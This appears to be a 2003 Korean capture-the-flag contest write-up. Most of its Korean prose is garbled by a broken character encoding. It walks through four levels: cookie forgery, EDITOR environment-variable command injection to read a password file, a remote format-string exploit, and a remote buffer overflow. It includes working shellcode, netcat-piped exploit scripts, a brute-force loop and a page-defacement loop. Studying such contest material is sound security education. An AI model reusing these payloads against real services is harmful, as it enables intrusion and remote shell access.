============================================================================

        2003 õд ŷ ȸ

============================================================================
o ۼ
-    : (mirinda)
- ̸ : w0rm9@hanmail.net

o ȸ  
- 4ܰ  ȹ

============================================================================
1. Ұ

[ 1 ܰ ]
http://211.205.70.252 Ͻþ    ȹϼ
admin ٽÿ  н带 ݴϴ.


[ 2 ܰ ]
211.205.70.252 18523/tcp Ʈ Ư  α׷ ϰ ֽϴ.
 α׷  ϸ ƯϾȿ  н尡 ֽϴ.


[ 3 ܰ ]
211.205.70.252 35232/tcpƮ Ư  ϰ ֽϴ.
Ư ɿ  ߻մϴ.


[ 4 ܰ ]
211.205.70.253 23152/tcpƮ Ư  ϰ ֽϴ.
ش  3   Format strings ġϿ  Ȱȭ  ߰Ǿ 
Ư ɿ Buffer Overflow մϴ.
4    ȸ     ؾ  ڰ ˴ϴ. 
   index.html Ͽ ڽ ID Խϸ ˴ϴ.
, Capture the flag   Դϴ.

===========================================================================
2.  Ǯ 

[ 1 ܰ ]
http://211.205.70.252 ϴ â  Ÿ.
 admin  ؾ߸  н带 شٰ 
 admin ȹϴ ̴.
â F11  ִȭϿ ּ(level1auth.html) ˾Ƴ view-source 
α â  Էµ  /cgi-bin/LeVel1NiMdA.cgi  POST  ٴ° ˰ԵǾ.
"HTTP  POST " α׷   ְ޴ Ŷ ĸغ
  κ   ־.

Set-Cookie: auth=user; expires=30-Nov-03 00:00:00 GMT; path=/cgi-bin/

ϰǵ auth=userκ  ϴ κΰ .
׷ٸ auth=admin ٲ㼭 Ű    .  ࿡ Űܺ.

[mirinda@localhost mirinda]$ telnet 211.205.70.252 80
POST /cgi-bin/LeVel1NiMdA.cgi        HTTP/1.0
Referer: http://211.205.70.252/level1auth.html
Accept-Lanuage: ko
Content-Type: acclication/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 211.205.70.252
Content-Length: 100
Cache-Control: no-cache
Cookie: auth=admin




HTTP/1.1 200 OK
Date: Wed, 26 Nov 2003 03:50:10 GMT
Server: Web/1.0.00 (Unix)
Set-Cookie: count=1; expires=30-Nov-03 00:00:00 GMT; path=/cgi-bin/
Connection: close
Content-Type: text/html

<html>
<head>
<title>Level1 Auth</title>
</head>
<body>

You are admin level.<br>

Next stage <hr>
<pre>
մϴ. 1  ذϼ̽ϴ.

 ð Ʒ ش ŷȸ  Ʈ

(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.

ش : 2qjsanswpfh%ok

</pre>

username : admin<br>
</body>
</html>



============================================================================
[ 2 ܰ ]
ش  غ ̻(?) commad  Ÿ.
help;    ɾ Ȯ  ־.

HELP=========================================
id;      : current user id
cul;     : calculator   eg) cul 1 + 2;
date;    : current date and time
cal;     : calendar
echo;    : message test eg) echo this is test;
src;     : view source
srcl;    : available source list
rand;    : generate random value
logtime; : login time
fortume; : fortune game
myip;    : print your IP

 "ƯϾȿ  н尡 ֽϴ."  Ͽ src ̿Ͽ  Ư     ϴ.
 src ҽ 

src src;
======= source =[src]====================
#!/bin/ksh

if /bin/test -z $1 ; then echo "usage: src <name>"; exit ; fi

fname=`/bin/basename $1`

if /bin/test -z $EDITOR ; then EDITOR=/bin/cat ; fi

echo "======= source =[$fname]===================="
$EDITOR source/$fname
echo "============================================"

ҽ  ǿ밡ɼ δ. export ̿ EDITOR شǴ ȯ溯  
src Ű   ϴ.
 source ƴ ٸ  캸.

export EDITOR="echo /*";
src src;
======= source =[src]====================
/bin /cal /cul /date /etc /fortune /help /id /lib /source /src /srcl /usr source/test

ֻ 丮   丮  

export EDITOR="echo /etc/*";
src src;
======= source =[src]====================
/etc/PASSWORD /etc/suid_profile source/src
============================================

PASSWORD  ã  ־.
  о    EDITOR ϸ ȴ.

export EDITOR="/bin/cat /etc/PASSWORD";
̷ EDITOR  ä   /bin/cat /etc/PASSWORD source/$fname

src src;
======= source =[src]====================
մϴ. 2  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
  3   ŷ ɷ 
 ȰϿ ذ ñ ٶϴ.

ش : wk!ghkxld-3
#!/bin/ksh

if /bin/test -z $1 ; then echo "usage: src <name>"; exit ; fi

fname=`/bin/basename $1`

if /bin/test -z $EDITOR ; then EDITOR=/bin/cat ; fi

echo "======= source =[$fname]===================="
$EDITOR source/$fname
echo "============================================"



============================================================================
[ 3 ܰ ]
ش  ؼ  ɾ(?) ĺ  ɾ Դ.
 κп û ߴ. Ư ɿ  ִٰ ؼ ɾ ϴ ãƾ Ǵ ˾Ҵ.
(ּ HELP ĺ  ̷  ð   ־ ٵ...ҹڷδ help ĺþµ...)

ƹư HELP   ɾ ٸ ɾ ٸ ۵ ϴµ
OPTD, OPTS, OPTE  ɾ ۵ Ͽ.
OPTD , OPTS ó ְ, OPTE Է ɾ Echo Ű ̿.

ٸ  ޸ ǽɵǴ κ , OPTE ǽɽ   ɼ on ¿
AAAA%x%x%x%x  Է Ҵ. ó fsb . װ͵ remote.

ͽ÷  غ.   ϰ, level3 йȣ Էϰ,
ɼ ѾѴ. ׷ OPTE, ׸ ÿ   Ȯغ  OPTS, ϱ  OPTD
  onŲ. shellcode ּҿ ret ּҷ  佺Ʈ ڵ带 Է  ˳  ۿ
NOPڵ Բ ڵ带 ִ α׷ ۼغҴ.

 κп   κ ret ּҸ ã° ̾. shellcode ּҴ   ñ  ʾƼ
  ,  , ret ּҰ  ʺ ϳ  ߴ.
ּҴ 0xbffefbcc, ũƮ ͽ÷ ۼ  ϴ 

================attck.sh================
#!/bin/sh
    (echo -ne "wk!ghkxld-3\nOPTE\nOPTS\nOPTD\nAAAA\xcc\xfb\xfe\xbfAAAA\xce\xfb\xfe\xbf%8x%8x%8x%64544c%hn%50102c%hn\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\n";cat) | nc 211.205.70.252 35232

cat PASSWORD
մϴ. 3  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
Ƿ Ͻñ.  ѹ ҽϴ.

ش : eoeks$tlffur&wk  



============================================================================
[ 4 ܰ ]
̹ ģϰԵ remote bof° ˷־.
ش  ϴ 3 ô ģ ɾ Ÿ.
̹   ɼ OPTS, OPTD, OPTE.. ɼ on Ų ¿ ̷  ɾ Էϴ 
USER ɿ ̻ κ ߰  ־.
USER AAAA   Էϸ ÿ =CHECK2=  =CHECK1= κ Ÿ ̴.
  Ʈ Է Ҵ.
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ̷  ܹȴ.
 ڸ Է   ˾ƺ 24 Է± , 25°  .
25° =CHECK1= ۺκ̴. ̰ ð δ. ش ڿ Էºκп  ڿ Ȱ Էν
  ־.   κп Segmentation fault  .  ret ġ ã° .
̹  ڿ Էϴ  α׷ Ǵ  ã  ־. =CHECK1=  120 Էϸ
α׷ Ͽ. Ʈ ¿ sfp ħϿ α׷ Ǵ, ret 뷫
USER AAAAAA24AAAAAA=CHECK1=AAAAAAAAAA120AAAAAAAAAA+4+ret

׷ ̹ Ʈ ̹Ƿ ͽ÷ ۼؾѴ.
̹  4 н带 Էϰ, ̹ ø Ȯϱ  OPTS on Ű, 
USER  CHECk1= Ȱ ,  ڿ NOPڵ带   ڵ带   ret ڵ ּҸ 
־ָ ǰڴٰ ϰ ͽ÷ ۼߴ.
 Ǿ ߴµ, Illegal Character found   ڿ ѷ־.
 ãƺ NOPڵ忴. ׷ 0x90 -> 0x40 üϰ ٽ ͽ÷  Ҵ.
̷ ̹  ۿ ־ ڵ ġ  (α׷ ų ) ٲ
 ߴ. ̷    ̴. ׷ ͽ÷ ѷ Ű α׷  ϳ ۼߴ.

================attack.c================
int main(){
        char cmd[1000];
        sprintf(cmd,"(printf \"eoeks\\$tlffur&wk\\nOPTS\\nUSER 123456789012345678901234=CHECK1=\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\xc8\xf5\xff\xbf\xc8\xf5\xff\xbf\\n\";cat) | nc 211.205.70.253 23152");
        system(cmd);
}

================loop.c================
main()
{
        for(;;){
        system("./attack");
        }
}

loop  attack  (Ȯ ʴ ּҸ enter ߾ Ѵ.) Ű Էص
ƹ ȭ .  ̴.
̹  PASSWORD ã 

cat /PASSWORD
մϴ. 4  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
4    ȸ     ؾ  ڰ ˴ϴ. 
   index.html Ͽ ڽ ID  Ȯ   ֵ
ǥϸ ˴ϴ. 
, Capture the flag   Դϴ. 

ش : cnr^rhwlrhtn%tmdflfmfdnlgo



[ Capture the flag ]
ó perl µ 𸣰, ksh ̿ؼ ũƮ § 

#!/bin/ksh

while [ 1 ]
do
echo "<font color=red size=10><b>mirinda@WiseGuyz</b></font>" > /htdocs/index.html
done

 Ű ۿ .
 ƾ ε  ȭ   ־.

ڴʰ perl   ˰  ҷص DOS   .
ƽ ⼭ ȸ ؾ߸ ߴ.

============================================================================
3. ȸı 

 ȸ غ  Ͻ, ׸ ûı ϼž ϴ
 в 帳ϴ.^^
Ʈ  ΰ  غ ȸ   ʿ߰,
 Ͽ б   ־ ʰԱ  ȸ .

 ƽ  ִٸ ȸ̳  ǰϴ Ȯ  ȸ   
ʾҴ Դϴ.     ŬѴٴ,    ª ð Ŭ ̶
   κ Ǵ ʰ Ǿ(ȸ ..)

 ȸ  index.html Ż ֱ ε ̿  Ȯ (?)  ׿.
 ý   ִ  Ѵٰ  ...
DOS ߴٸ ̸  ߴٸ   ߳׿.


 ȸ   ȸ մϴ.^^
׷     ŵνñ ٶϴ.



ps.  4    Ű ʴ´ٸ  ׷ Ȯ ä 
ȹ θ ؾ    ְڳ׿.

ps2.   ż  µ ָԾϴ. :(
